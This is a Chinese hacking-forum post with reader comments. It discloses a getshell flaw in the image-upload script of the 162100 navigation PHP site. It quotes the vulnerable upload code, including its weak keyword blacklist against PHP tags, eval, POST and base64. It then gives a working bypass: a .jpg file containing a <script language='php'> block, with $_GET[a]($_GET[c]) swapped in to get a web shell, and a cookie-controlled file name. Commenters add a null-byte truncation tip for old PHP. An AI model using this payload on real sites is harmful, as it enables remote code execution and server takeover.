【我爱T00LS】162100导航 GETSHELL
./inc/require/z_other_face_up.php
$web['img_name_b'] = 'face-'.urlencode($session[0]);//这个是从cookie中获取的,为cookie explode |之后的第一个字符
//gmdate("YmdHis", time() + (floatval($web["time_pos"]) * 3600));
//本机上传
if ($_POST['ptype'] == 1) {
if ($web['max_file_size'][15] == 0) {
err('系统设定为禁止上传。');
}
if (is_array($_FILES['purl1']) && $_FILES['purl1']['size']) {
@chmod('../../data', 0777);
if (!file_exists($web['img_up_dir']) && !@mkdir($web['img_up_dir'], 0777)) {
err('图片无法上传,上传目录不存在。');
}
$inis = ini_get_all();
$uploadmax = $inis['upload_max_filesize'];
if ($_FILES['purl1']['size'] > $web['max_file_size'][15] * 1024) {
err('图片上传不成功!上传的文件请小于'.$web['max_file_size'][15].'KB。');
}
if (!preg_match('/\.(jpg|gif|png)$/i', strtolower($_FILES['purl1']['name']), $matches)) {
err('图片上传不成功!请选择一个有效的文件:允许的格式有(jpg|gif|png)。');
}
if ($fp = @fopen($_FILES['purl1']['tmp_name'], 'rb')) {
$img_contents = @fread($fp, $_FILES['purl1']['size']);
@fclose($fp);
} else {
$img_contents = @file_get_contents($_FILES['purl1']['tmp_name']);
}
if (preg_match('/<\?php|eval|POST|base64_decode|base64_encode/i', $img_contents, $m_err)) {
err('提示!禁止提交。该文件含有禁止的代码'.str_replace('?', '\?', $m_err[0]).'。');
}
@chmod($web['img_up_dir'], 0777);
if (@move_uploaded_file($_FILES['purl1']['tmp_name'], $web['img_up_dir'].'/'.$web['img_name_b'].'.'.$matches[1])) {
测试 /__temp__/face-12345.php.jpg[/img]
他的过滤太弱智了
<script language='php'>phpinfo();</script>
中间改成 $_GET[a]($_GET[c])就能绕过了
关于作者
评论21次
撸主,你真心牛x!!!
lz,真牛啊
发飙了啊。发了好多这些,谢谢哇
楼主好思路!
我终于知道 你为什么搞这么一个 id 了 而且那么喜欢挖洞 你已经快接近 condom 邪恶不我
再顶、、、、、、、、、、、、、、、、
不错 学xi学xi
楼主求带啊。
楼主开启了暴走模式了吗?
我不是再灌水,我是在膜拜~~
lz高产啊,你这是在刷0day吗
学xi了,多谢分享
谢谢楼主公开洞子
洞主看来今天有喜事啊
量产专家啊。
撸主,你真心牛x!!!
1.php.jpg这种还是没法解析的嘛,只有在php<5.3.4可以考虑截断突破
同上。LZ 拜入你门下如何
lz拜入你门下怎么样。。。
LZ 今天疯狂发洞啊